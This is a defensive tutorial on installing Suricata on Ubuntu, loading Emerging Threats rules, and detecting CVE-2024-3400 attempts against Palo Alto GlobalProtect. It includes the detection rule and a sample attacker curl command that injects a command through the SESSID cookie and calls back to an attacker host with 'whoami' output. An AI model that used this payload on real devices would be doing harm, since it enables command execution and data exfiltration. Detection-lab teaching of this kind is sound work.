IDS (Intrusion Detection System) and IPS (Intrusion Prevention System) are basic components of any Security Operation Center that help detect and prevent unauthorized use of computer systems or networks.
While IDSs have detection capabilities, IPSs have prevention capabilities. IDS/IPS systems provide detection and prevention capabilities by analyzing network traffic to detect malicious content. There are two types of IDS/IPS systems in the cybersecurity industry: Host-based and network-based.
“Suricata is a high-performance Network IDS, IPS, and Network Security Monitoring Engine. Suricata is open source and owned by a community-run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by the OISF.” (Source: https://docs.suricata.io)
The Suricata source code is licensed under version 2 of the GNU General Public License.
Now we will install and configure Suricata on Ubuntu as a host-based intrusion detection system, which is the default mode.
First, we should update the packages on Ubuntu with the following command:
sudo apt-get update
Now, we are ready to install Suricata.
Installing Suricata on Ubuntu is quite easy. All we need to do is to use the following command:
sudo apt-get install suricata -y
To find out the Suricata version on Ubuntu, just type the following command:
suricata -V
After downloading Suricata, you can examine the status of the Suricata service with the following command::
systemctl status suricata
Suricata runs according to information in the /etc/suricata/suricata.yml file. The most important part of the configuration file /etc/suricata/suricata.yml is the part where we specify which network address and which interface Suricata is to monitor. In this case, we will monitor the Ubuntu network interface card and acquire the IP address of the Ubuntu machine.
Using the following command, let's check the network interface card of the Ubuntu machine and its IP address:
ip a
Before editing the configuration file, we should stop the Suricata service with the following command:
systemctl stop suricata
Now open the configuration file of Suricata with your favorite text editor. First, change the HOME_NET variable to 172.16.101.132/32, then change the interface to the ens160 in the af-packet section. Don’t forget to save your changes.
sudo vim /etc/suricata/suricata.yml
Another important point in the configuration is the location of the rule file. Suricata's rule files are specified in the default rule path in the configuration file /etc/suricata/suricata.yml.
By default, Suricata reads rules from the file /var/lib/suricata/rules/suricata.rules. Thus, this file contains Suricata rules.
We can download and update Emerging Threats rules on the Suricata with the following command:
sudo suricata-update
Now, we can launch the Suricata service with the following command:
systemctl start suricata
Then check the status of the Suricata service with the following command:
systemctl status suricata
To protect our environment, understanding the Suricata rule structure is critical. Let's work through an example case to put theory into practice.
First, search for the cve-2024-3400 Palo Alto Command Injection Vulnerability rule in the suricata.rules file using the following command:
sudo cat /var/lib/suricata/rules/suricata.rules | grep CVE-2024-3400
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Session Cookie Command Injection Attempt (CVE-2024-3400)"; flow:established,to_server; http.cookie; content:"SESSID="; startswith; content:"/opt/panlogs/tmp/device_telemetry/"; within:80; fast_pattern; content:"|60|"; within:21; content:"|24 7b|IFS|7d|"; within:30; reference:cve,2024-3400; reference:url,labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/; classtype:trojan-activity; sid:2052122; rev:1; metadata:affected_product Palo_Alto_Networks, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 2024_04_16, cve CVE_2024_3400, deployment Perimeter, deployment Internal, deployment SSLDecrypt, former_category WEB_SPECIFIC_APPS, performance_impact Low, confidence High, signature_severity Major, updated_at 2024_04_16; target:dest_ip;)
This rule generates an alert if all of the following conditions are met:
Now we are going to attack from the attacker's machine, which is sending the CVE-2024-3400 exploit request, with the following command:
curl http[:]//172[.]16.101.132/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}172[.]16.101.131:4444?user=$(whoami)`'
Let's have a look at exploitation attempts with Suricata. Suricata logs are stored in the file /var/log/suricata/eve.json by default. To display the logs neatly, we can use jq. To view exploitation attempts, use the following command:
cat /var/log/suricata/eve.json | grep CVE-2024-3400 | jq .
Suricata is an open-source IDS/IPS and network monitoring system that is widely used in the cybersecurity industry due to its large community and ease of usage. Suricata can be used for various tasks such as:
In this article, we explained how to install Suricata as a host-based IDS, install Suricata rules from the Emerging Threats signature database, analyze the CVE-2024-3400 signature, and finally detect CVE-2024-3400 exploitation attempts with Suricata.
